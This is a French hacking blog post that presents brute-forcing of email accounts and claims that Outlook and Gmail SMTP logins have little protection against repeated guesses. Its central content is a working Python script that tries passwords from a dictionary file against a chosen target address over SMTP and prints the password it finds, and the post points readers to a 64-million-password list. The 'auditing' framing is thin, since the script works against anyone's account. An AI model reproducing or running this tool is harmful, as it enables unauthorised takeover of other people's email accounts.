[Brutus] Trouver le mot de passe d’un compte Gmail, Outlook, ….

 

warrior2

 

 

Salut les z'amis !

Bon Weekend à vous !
Ici nous allons parler de brute !
Vous m'avez bien entendu, souvenez-vous du grand gaillard bien bâti qui vous piquait toutes les nanas et vous volait en plus vos carambars à la récré ...

 

 

Eh bien nous allons observer un moment de silence ...
Car une technique de Hacking, ressemble plus ou moins à de ce genre de personnage ... le "brute force" ...  et nous allons l'étudier aujourd'hui dans cet article

Une technique qui consiste à secouer un système en lui envoyant pleins de mot de passe dans la tronche, jusqu'à ce que celui-ci aquiesce gentiment lorsqu'il reçoit le bon ...

 

Bref, ce sont mes copains d'Aston Ecole qui m'ont inspiré cet article.
Car Nathan, l'heureux gagnant du concours organisé par LockSelf, a publié une vidéo sur Youtube de ces exploits en python ...
Démontrant ainsi qu'il était possible de brute forcer un compte Gmail !

Aussi, j'ai vu ça ... et dans ma tête ça a été ça ...

 

 

 

Bref, en gros j'ai percuté sur un truc tout con ...
Lorsque l'on s'essaie à faire du brute force sur des formulaires de connexion ...
Les diverses messageries Outlook, Gmail, Yahoo, ... se montrent très peu réceptives...
Elles finissent carrément par nous chasser à coup de captcha, voir nous bannir ..

 

Mais lorsque l'on s'attaque en brute force, directement au serveur smtp ...
Biiim ! il n'y a aucun contrôle!
C'est OPEN BAR ... pas de sécurité type fail2ban ...

21 ème siècle !

 

C'est tout simplement hallucinant ...

Bref, j'ai voulu vous partager un petit bout de script fonctionnel, que j'ai rédigé, pour m'assurer que ça n'était pas du flan ...
Et bien non ... ça n'en n'est pas ...
Nous sommes au 21 ème siècles, et des grosses boites comme Google, se sécurisent à hauteur de 50%  contre ce genre d'attaque du moyen age ...

 

#!/usr/bin/python
# Dyrk.org 2016-2017

import smtplib

# Outlook.com
smtp_s   = 'smtp-mail.outlook.com'

# Gmail
# smtp_s = 'smtp.gmail.com'

smtp_p = 587
sender = 'target_adress@hotmail.com'
dico   = 'pwdlist.txt'

with open(dico) as f:
    for password in f:
        password = password.replace('\n', '')
        try:
            m = smtplib.SMTP(smtp_s, smtp_p)
            m.ehlo()
            m.starttls()
            m.login(sender, password)
            print '[OK] => ' + sender + ' : ' + password
            m.close()
            exit()
        except smtplib.SMTPAuthenticationError, e:
            if e[0] == 534:  # Gmail
                print '[OK] => ' + sender + ' : ' + password
                print e
                exit()
            else:
                print 'try ' + password + ' .... err. ' + str(e[0]) \
                    + '   >>>  ' + e[1]

			

 

Voilà, avec ça ...
Vous pourrez en :

  • configurant une adresse email cible
  • renseignant une configuration smtp correspondante à l'adresse cible
  • spécifiant un fichier dictionnaire contenant un mot de passe ligne par ligne ...

Parvenir à auditer la sécurité d'une adresse email ...

 

Vous trouverez sur cette page, un dictionnaire de 64 millions de mots de passe

 

 

 

 

 

Partagez ce contenu

19 comments

Laisser une réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *